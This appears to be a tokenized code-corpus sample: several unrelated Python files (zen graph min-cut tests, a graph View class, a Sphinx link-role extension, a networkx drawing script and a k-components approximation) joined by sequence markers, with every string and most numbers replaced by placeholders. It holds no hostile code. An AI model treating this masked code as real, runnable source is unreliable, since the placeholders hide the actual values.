( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . 
add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> self . assertEquals ( <NUM_LIT> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( float ( '<STR_LIT>' ) , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> def test_min_cut_set ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . 
add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:c>' , '<STR_LIT:f>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:g>' , '<STR_LIT:h>' ) in cut_set ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:c>' , '<STR_LIT:f>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:g>' , '<STR_LIT:h>' ) in cut_set ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . 
assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> def test_min_cut_set_ ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . 
add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:6> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT> in cut_set ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:6> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT> in cut_set ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . 
assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from exceptions import * <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> NAN = float ( '<STR_LIT>' ) <EOL> CIRCLE = '<STR_LIT>' <EOL> SHAPES = [ CIRCLE ] <EOL> SHAPE_DIMS = { <EOL> CIRCLE : <NUM_LIT:1> , <EOL> } <EOL> def circle_shape ( radius ) : <EOL> """<STR_LIT>""" <EOL> return ( CIRCLE , radius ) <EOL> class View : <EOL> def __init__ ( self , G , pos_array = None ) : <EOL> """<STR_LIT>""" <EOL> self . G = G <EOL> self . _pos = pos_array <EOL> self . _ncolors = { } <EOL> self . _default_ncolor = None <EOL> self . _nborders = { } <EOL> self . _default_nborder = None <EOL> self . _nshape = { } <EOL> self . _nshape_dim = { } <EOL> self . _default_nshape = CIRCLE <EOL> self . _default_nshape_dim = ( <NUM_LIT:0.1> , ) <EOL> self . _max_shape_radius = <NUM_LIT:0.1> <EOL> self . _ecolors = { } <EOL> self . _default_ecolor = None <EOL> self . _ewidths = { } <EOL> self . _default_ewidth = None <EOL> def graph ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . G <EOL> def set_shape_ ( self , nidx , shape_info ) : <EOL> """<STR_LIT>""" <EOL> if shape_info is not None : <EOL> self . __check_shape ( shape_info ) <EOL> self . _nshape [ nidx ] = shape_info <EOL> max_radius = self . __shape_radius ( shape_info [ <NUM_LIT:0> ] , shape_info [ <NUM_LIT:1> ] ) <EOL> if max_radius > self . _max_shape_radius : <EOL> self . _max_shape_radius = max_radius <EOL> else : <EOL> del self . _nshape [ nidx ] <EOL> def shape_ ( self , nidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if nidx not in self . _nshape : <EOL> if use_default : <EOL> return self . get_default_shape ( ) <EOL> else : <EOL> return None <EOL> else : <EOL> return self . 
_nshape [ nidx ] <EOL> def __check_shape ( self , shape_info ) : <EOL> shape = shape_info [ <NUM_LIT:0> ] <EOL> dim = shape_info [ <NUM_LIT:1> ] <EOL> if shape not in SHAPE_DIMS : <EOL> raise ZenException , '<STR_LIT>' % shape <EOL> if len ( dim ) != SHAPE_DIMS [ shape ] : <EOL> raise ZenException , '<STR_LIT>' % ( shape , SHAPE_DIMS [ shape ] , len ( dim ) ) <EOL> return <EOL> def __shape_radius ( self , shape , shape_dims ) : <EOL> if shape == CIRCLE : <EOL> return shape_dims [ <NUM_LIT:0> ] <EOL> else : <EOL> raise ZenException , '<STR_LIT>' % shape <EOL> def set_default_shape ( self , shape_info ) : <EOL> """<STR_LIT>""" <EOL> self . __check_shape ( shape_info ) <EOL> self . _default_nshape = shape_info [ <NUM_LIT:0> ] <EOL> self . _default_nshape_dim = shape_info [ <NUM_LIT:1> ] <EOL> max_radius = self . __shape_radius ( shape_info [ <NUM_LIT:0> ] , shape_info [ <NUM_LIT:1> ] ) <EOL> if max_radius > self . _max_shape_radius : <EOL> self . _max_shape_radius = max_radius <EOL> def get_default_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_nshape , self . _default_nshape_dim <EOL> def has_pos_array ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pos != None <EOL> def set_pos_array ( self , pos_array ) : <EOL> """<STR_LIT>""" <EOL> self . _pos = pos_array <EOL> def pos_array ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pos <EOL> def max_x ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . _max_shape_radius <EOL> return max ( self . _pos [ : , <NUM_LIT:0> ] ) + shape_buffer <EOL> def max_y ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . _max_shape_radius <EOL> return max ( self . _pos [ : , <NUM_LIT:1> ] ) + shape_buffer <EOL> def min_x ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . 
_max_shape_radius <EOL> return min ( self . _pos [ : , <NUM_LIT:0> ] ) - shape_buffer <EOL> def min_y ( self ) : <EOL> shape_buffer = <NUM_LIT:0> <EOL> if self . _max_shape_radius is not None : <EOL> shape_buffer = self . _max_shape_radius <EOL> return min ( self . _pos [ : , <NUM_LIT:1> ] ) - shape_buffer <EOL> def pos_x_ ( self , nidx ) : <EOL> if self . _pos is None : <EOL> return NAN <EOL> else : <EOL> return self . _pos [ nidx , <NUM_LIT:0> ] <EOL> def pos_y_ ( self , nidx ) : <EOL> if self . _pos is None : <EOL> return NAN <EOL> else : <EOL> return self . _pos [ nidx , <NUM_LIT:1> ] <EOL> def pos_ ( self , nidx ) : <EOL> if self . _pos is None : <EOL> return NAN , NAN <EOL> else : <EOL> return self . _pos [ nidx , <NUM_LIT:0> ] , self . _pos [ nidx , <NUM_LIT:1> ] <EOL> def node_border_ ( self , nidx , use_default = True ) : <EOL> if nidx not in self . _nborders : <EOL> if use_default : <EOL> return self . _default_nborder <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _nborders [ nidx ] <EOL> def set_node_border_ ( self , nidx , border_info ) : <EOL> if border_info is not None : <EOL> self . _nborders [ nidx ] = border_info <EOL> else : <EOL> del self . _nborders [ nidx ] <EOL> def node_color_ ( self , nidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if nidx not in self . _ncolors : <EOL> if use_default : <EOL> return self . _default_ncolor <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _ncolors [ nidx ] <EOL> def set_node_color_ ( self , nidx , color ) : <EOL> """<STR_LIT>""" <EOL> if color is not None : <EOL> self . _ncolors [ nidx ] = color <EOL> elif nidx in self . _ncolors : <EOL> del self . _ncolors [ nidx ] <EOL> def edge_color_ ( self , eidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if eidx not in self . _ecolors : <EOL> if use_default : <EOL> return self . _default_ecolor <EOL> else : <EOL> return None <EOL> else : <EOL> return self . 
_ecolors [ eidx ] <EOL> def set_edge_color_ ( self , eidx , color ) : <EOL> """<STR_LIT>""" <EOL> if color is not None : <EOL> self . _ecolors [ eidx ] = color <EOL> elif eidx in self . _ecolors : <EOL> del self . _ecolors [ eidx ] <EOL> def edge_width_ ( self , eidx , use_default = True ) : <EOL> """<STR_LIT>""" <EOL> if eidx not in self . _ewidths : <EOL> if use_default : <EOL> return self . _default_ewidth <EOL> else : <EOL> return None <EOL> else : <EOL> return self . _ewidths [ eidx ] <EOL> def set_edge_width_ ( self , eidx , width ) : <EOL> """<STR_LIT>""" <EOL> if width is not None : <EOL> self . _ewidths [ eidx ] = width <EOL> elif eidx in self . _ewidths : <EOL> del self . _ewidths [ eidx ] <EOL> def default_node_border ( self ) : <EOL> return self . _default_nborder <EOL> def set_default_node_border ( self , border_info ) : <EOL> self . _default_nborder = border_info <EOL> def default_node_color ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_ncolor <EOL> def set_default_node_color ( self , color ) : <EOL> """<STR_LIT>""" <EOL> self . _default_ncolor = color <EOL> def default_edge_color ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_ecolor <EOL> def set_default_edge_color ( self , color ) : <EOL> """<STR_LIT>""" <EOL> self . _default_ecolor = color <EOL> def default_edge_width ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _default_ewidth <EOL> def set_default_edge_width ( self , width ) : <EOL> """<STR_LIT>""" <EOL> self . _default_ewidth = width </s>
<s> """<STR_LIT>""" <EOL> from docutils import nodes , utils <EOL> from docutils . parsers . rst import roles <EOL> from sphinx import addnodes <EOL> from sphinx . util import ws_re , caption_ref_re <EOL> def sample_role ( name , rawtext , text , lineno , inliner , options = { } , content = [ ] ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> prefixed_roles = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> no_text_roles = [ <EOL> '<STR_LIT:url>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def prefixed_role ( name , rawtext , text , lineno , inliner , options = { } , content = [ ] ) : <EOL> prefix , baseuri = prefixed_roles [ name ] <EOL> uri = baseuri + text <EOL> display = utils . unescape ( text ) <EOL> node = nodes . literal ( prefix , prefix ) <EOL> ref = nodes . reference ( rawtext , display , refuri = uri , ** options ) <EOL> node += ref <EOL> return [ node ] , [ ] <EOL> def url_role ( name , rawtext , text , lineno , inliner , options = { } , content = [ ] ) : <EOL> uri = text <EOL> display = '<STR_LIT:url>' <EOL> node = nodes . literal ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> node += nodes . reference ( rawtext , name , refuri = uri , ** options ) <EOL> return [ node ] , [ ] <EOL> def trac_ticket_role ( name , rawtext , text , lineno , inliner , <EOL> options = { } , content = [ ] ) : <EOL> app = inliner . document . settings . env . app <EOL> try : <EOL> base = app . config . trac_url <EOL> if not base : <EOL> raise AttributeError <EOL> except AttributeError as err : <EOL> msg = '<STR_LIT>' <EOL> raise ValueError ( msg % str ( err ) ) <EOL> slash = '<STR_LIT:/>' if base [ - <NUM_LIT:1> ] != '<STR_LIT:/>' else '<STR_LIT>' <EOL> prefix = '<STR_LIT>' <EOL> node = nodes . literal ( prefix , prefix ) <EOL> display = utils . unescape ( text ) <EOL> uri = base + slash + '<STR_LIT>' + text <EOL> node += nodes . 
reference ( rawtext , display , refuri = uri , ** options ) <EOL> return [ node ] , [ ] <EOL> def trac_changeset_role ( name , rawtext , text , lineno , inliner , <EOL> options = { } , content = [ ] ) : <EOL> app = inliner . document . settings . env . app <EOL> try : <EOL> base = app . config . trac_url <EOL> if not base : <EOL> raise AttributeError <EOL> except AttributeError as err : <EOL> msg = '<STR_LIT>' <EOL> raise ValueError ( msg % str ( err ) ) <EOL> slash = '<STR_LIT:/>' if base [ - <NUM_LIT:1> ] != '<STR_LIT:/>' else '<STR_LIT>' <EOL> unescaped = utils . unescape ( text ) <EOL> prefix = '<STR_LIT>' <EOL> node = nodes . literal ( prefix , prefix ) <EOL> if unescaped . endswith ( '<STR_LIT>' ) : <EOL> display = unescaped . split ( '<STR_LIT:/>' ) [ <NUM_LIT:0> ] <EOL> else : <EOL> display = unescaped [ : <NUM_LIT:12> ] <EOL> uri = base + slash + '<STR_LIT>' + text <EOL> node += nodes . reference ( rawtext , display , refuri = uri , ** options ) <EOL> return [ node ] , [ ] <EOL> active_roles = { <EOL> '<STR_LIT>' : prefixed_role , <EOL> '<STR_LIT>' : prefixed_role , <EOL> '<STR_LIT>' : url_role , <EOL> '<STR_LIT:url>' : url_role , <EOL> '<STR_LIT>' : trac_ticket_role , <EOL> '<STR_LIT>' : trac_changeset_role , <EOL> } <EOL> for role in active_roles . values ( ) : <EOL> role . __doc__ = sample_role . __doc__ <EOL> def setup ( app ) : <EOL> for role , func in active_roles . items ( ) : <EOL> roles . register_local_role ( role , func ) <EOL> app . add_config_value ( '<STR_LIT>' , None , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import matplotlib . pyplot as plt <EOL> except : <EOL> raise <EOL> import networkx as nx <EOL> G = nx . path_graph ( <NUM_LIT:8> ) <EOL> nx . draw ( G ) <EOL> plt . savefig ( "<STR_LIT>" ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import collections <EOL> import networkx as nx <EOL> from networkx . exception import NetworkXError <EOL> from networkx . utils import not_implemented_for <EOL> from networkx . algorithms . approximation import local_node_connectivity <EOL> from networkx . algorithms . connectivity import local_node_connectivity as exact_local_node_connectivity <EOL> from networkx . algorithms . connectivity import build_auxiliary_node_connectivity <EOL> from networkx . algorithms . flow import build_residual_network <EOL> __author__ = """<STR_LIT:\n>""" . join ( [ '<STR_LIT>' ] ) <EOL> __all__ = [ '<STR_LIT>' ] <EOL> not_implemented_for ( '<STR_LIT>' ) <EOL> def k_components ( G , min_density = <NUM_LIT> ) : <EOL> r"""<STR_LIT>""" <EOL> k_components = collections . defaultdict ( list ) <EOL> node_connectivity = local_node_connectivity <EOL> k_core = nx . k_core <EOL> core_number = nx . core_number <EOL> biconnected_components = nx . biconnected_components <EOL> density = nx . density <EOL> combinations = itertools . combinations <EOL> for component in nx . connected_components ( G ) : <EOL> comp = set ( component ) <EOL> if len ( comp ) > <NUM_LIT:1> : <EOL> k_components [ <NUM_LIT:1> ] . append ( comp ) <EOL> for bicomponent in nx . biconnected_components ( G ) : <EOL> bicomp = set ( bicomponent ) <EOL> if len ( bicomp ) > <NUM_LIT:2> : <EOL> k_components [ <NUM_LIT:2> ] . append ( bicomp ) <EOL> g_cnumber = core_number ( G ) <EOL> max_core = max ( g_cnumber . values ( ) ) <EOL> for k in range ( <NUM_LIT:3> , max_core + <NUM_LIT:1> ) : <EOL> C = k_core ( G , k , core_number = g_cnumber ) <EOL> for nodes in biconnected_components ( C ) : <EOL> if len ( nodes ) < k : <EOL> continue <EOL> SG = G . subgraph ( nodes ) <EOL> H = _AntiGraph ( ) <EOL> H . add_nodes_from ( SG . nodes ( ) ) <EOL> for u , v in combinations ( SG , <NUM_LIT:2> ) : <EOL> K = node_connectivity ( SG , u , v , cutoff = k ) <EOL> if k > K : <EOL> H . 
add_edge ( u , v ) <EOL> for h_nodes in biconnected_components ( H ) : <EOL> if len ( h_nodes ) <= k : <EOL> continue <EOL> SH = H . subgraph ( h_nodes ) <EOL> for Gc in _cliques_heuristic ( SG , SH , k , min_density ) : <EOL> for k_nodes in biconnected_components ( Gc ) : <EOL> Gk = nx . k_core ( SG . subgraph ( k_nodes ) , k ) <EOL> if len ( Gk ) <= k : <EOL> continue <EOL> k_components [ k ] . append ( set ( Gk ) ) <EOL> return k_components <EOL> def _cliques_heuristic ( G , H , k , min_density ) : <EOL> h_cnumber = nx . core_number ( H ) <EOL> for i , c_value in enumerate ( sorted ( set ( h_cnumber . values ( ) ) , reverse = True ) ) : <EOL> cands = set ( n for n , c in h_cnumber . items ( ) if c == c_value ) <EOL> if i == <NUM_LIT:0> : <EOL> overlap = False <EOL> else : <EOL> overlap = set . intersection ( * [ <EOL> set ( x for x in H [ n ] if x not in cands ) <EOL> for n in cands ] ) <EOL> if overlap and len ( overlap ) < k : <EOL> SH = H . subgraph ( cands | overlap ) <EOL> else : <EOL> SH = H . subgraph ( cands ) <EOL> sh_cnumber = nx . core_number ( SH ) <EOL> SG = nx . k_core ( G . subgraph ( SH ) , k ) <EOL> while not ( _same ( sh_cnumber ) and nx . density ( SH ) >= min_density ) : <EOL> SH = H . subgraph ( SG ) <EOL> if len ( SH ) <= k : <EOL> break <EOL> sh_cnumber = nx . core_number ( SH ) <EOL> sh_deg = dict ( SH . degree ( ) ) <EOL> min_deg = min ( sh_deg . values ( ) ) <EOL> SH . remove_nodes_from ( n for n , d in sh_deg . items ( ) if d == min_deg ) <EOL> SG = nx . k_core ( G . subgraph ( SH ) , k ) <EOL> else : <EOL> yield SG <EOL> def _same ( measure , tol = <NUM_LIT:0> ) : <EOL> vals = set ( measure . values ( ) ) <EOL> if ( max ( vals ) - min ( vals ) ) <= tol : <EOL> return True <EOL> return False <EOL> class _AntiGraph ( nx . Graph ) : <EOL> """<STR_LIT>""" <EOL> all_edge_dict = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> def single_edge_dict ( self ) : <EOL> return self . 
all_edge_dict <EOL> edge_attr_dict_factory = single_edge_dict <EOL> def __getitem__ ( self , n ) : <EOL> """<STR_LIT>""" <EOL> all_edge_dict = self . all_edge_dict <EOL> return dict ( ( node , all_edge_dict ) for node in <EOL> set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) ) <EOL> def neighbors ( self , n ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return iter ( set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) ) <EOL> except KeyError : <EOL> raise NetworkXError ( "<STR_LIT>" % ( n , ) ) <EOL> def degree ( self , nbunch = None , weight = None ) : <EOL> """<STR_LIT>""" <EOL> if nbunch in self : <EOL> nbrs = { v : self . all_edge_dict for v in set ( self . adj ) - set ( self . adj [ nbunch ] ) - set ( [ nbunch ] ) } <EOL> if weight is None : <EOL> return len ( nbrs ) + ( nbunch in nbrs ) <EOL> return sum ( ( nbrs [ nbr ] . get ( weight , <NUM_LIT:1> ) for nbr in nbrs ) ) + ( nbunch in nbrs and nbrs [ nbunch ] . get ( weight , <NUM_LIT:1> ) ) <EOL> if nbunch is None : <EOL> nodes_nbrs = ( ( n , { v : self . all_edge_dict for v in <EOL> set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) } ) <EOL> for n in self . nodes ( ) ) <EOL> else : <EOL> nodes_nbrs = ( ( n , { v : self . all_edge_dict for v in <EOL> set ( self . nodes ( ) ) - set ( self . adj [ n ] ) - set ( [ n ] ) } ) <EOL> for n in self . nbunch_iter ( nbunch ) ) <EOL> if weight is None : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> yield ( n , len ( nbrs ) + ( n in nbrs ) ) <EOL> else : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> yield ( n , sum ( ( nbrs [ nbr ] . get ( weight , <NUM_LIT:1> ) for nbr in nbrs ) ) + <EOL> ( n in nbrs and nbrs [ n ] . get ( weight , <NUM_LIT:1> ) ) ) <EOL> return d_iter ( ) <EOL> def adjacency ( self ) : <EOL> """<STR_LIT>""" <EOL> for n in self . adj : <EOL> yield ( n , set ( self . adj ) - set ( self . adj [ n ] ) - set ( [ n ] ) ) 